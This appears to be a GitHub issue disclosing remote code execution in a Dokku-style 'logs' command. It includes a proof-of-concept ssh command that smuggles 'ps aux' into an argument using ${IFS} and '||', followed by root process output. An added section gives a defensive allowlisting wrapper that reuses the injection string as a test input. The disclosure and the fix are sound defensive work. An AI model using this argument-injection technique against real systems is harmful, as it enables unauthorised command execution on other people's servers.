RCE
overjt opened this issue · 1 comments
overjt commented
The system is vulnerable to remote code execution.
POC
ssh dokku@HOST logs GITHUBUSERHASHED-PROJECTNAME "-n${IFS}2||${IFS}ps${IFS}aux${IFS}||echo"
Response
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 57816 7708 ? Ss Feb08 14:38 /lib/systemd/systemd --system --deserialize 25
root 2 0.0 0.0 0 0 ? S Feb08 0:04 [kthreadd]
root 3 0.0 0.0 0 0 ? S Feb08 10:48 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Feb08 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S Feb08 101:17 [rcu_sched]
root 8 0.0 0.0 0 0 ? S Feb08 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S Feb08 14:45 [migration/0]
root 10 0.0 0.0 0 0 ? S< Feb08 0:00 [lru-add-drain]
root 11 0.0 0.0 0 0 ? S Feb08 0:55 [watchdog/0]
root 12 0.0 0.0 0 0 ? S Feb08 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S Feb08 0:00 [cpuhp/1]
root 14 0.0 0.0 0 0 ? S Feb08 0:46 [watchdog/1]
root 15 0.0 0.0 0 0 ? S Feb08 14:21 [migration/1]
root 16 0.0 0.0 0 0 ? S Feb08 0:59 [ksoftirqd/1]
root 18 0.0 0.0 0 0 ? S< Feb08 0:00 [kworker/1:0H]
root 19 0.0 0.0 0 0 ? S Feb08 0:00 [kdevtmpfs]
root 20 0.0 0.0 0 0 ? S< Feb08 0:00 [netns]
root 21 0.0 0.0 0 0 ? S Feb08 1:25 [khungtaskd]
root 22 0.0 0.0 0 0 ? S Feb08 0:00 [oom_reaper]
root 23 0.0 0.0 0 0 ? S< Feb08 0:00 [writeback]
...
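An added example, not part of the original report and not the affected system's code: one way a `logs` wrapper could refuse the option string shown in the POC, by allowlisting the options and passing them on as separate words instead of re-parsing a joined string. The function names, the `LOGS_BACKEND` variable, the accepted options (`-t`, `-n <digits>`) and the app-name rule are assumptions made for illustration.

```shell
#!/bin/sh
# Added example. validate_app, validate_logs_args, run_logs and LOGS_BACKEND
# are hypothetical names, not taken from the affected system.

# Assumed naming rule: lowercase letters, digits and hyphens, no leading "-".
validate_app() {
  case "$1" in
    ''|-*|*[!a-z0-9-]*) return 1 ;;
  esac
  return 0
}

# Allowlist: only "-t" and "-n <digits>" are accepted; anything else fails.
validate_logs_args() {
  while [ "$#" -gt 0 ]; do
    case "$1" in
      -t) shift ;;
      -n)
        [ "$#" -ge 2 ] || return 1
        case "$2" in
          ''|*[!0-9]*) return 1 ;;
        esac
        shift 2 ;;
      *) return 1 ;;
    esac
  done
  return 0
}

# Pass every validated argument as its own word: no eval, no "sh -c",
# no re-parsing of a joined string. LOGS_BACKEND defaults to echo so the
# example runs offline.
run_logs() {
  [ "$#" -ge 1 ] || return 2
  app=$1
  shift
  validate_app "$app" || { echo "invalid app name" >&2; return 2; }
  validate_logs_args "$@" || { echo "invalid logs option" >&2; return 2; }
  "${LOGS_BACKEND:-echo}" logs "$app" "$@"
}

# Constructed inputs: the first is accepted, the second (modelled on the
# option string in the POC) is refused before any command is built.
run_logs my-app -n 20
run_logs my-app '-n${IFS}2||${IFS}ps${IFS}aux${IFS}||echo' || echo "rejected"
```
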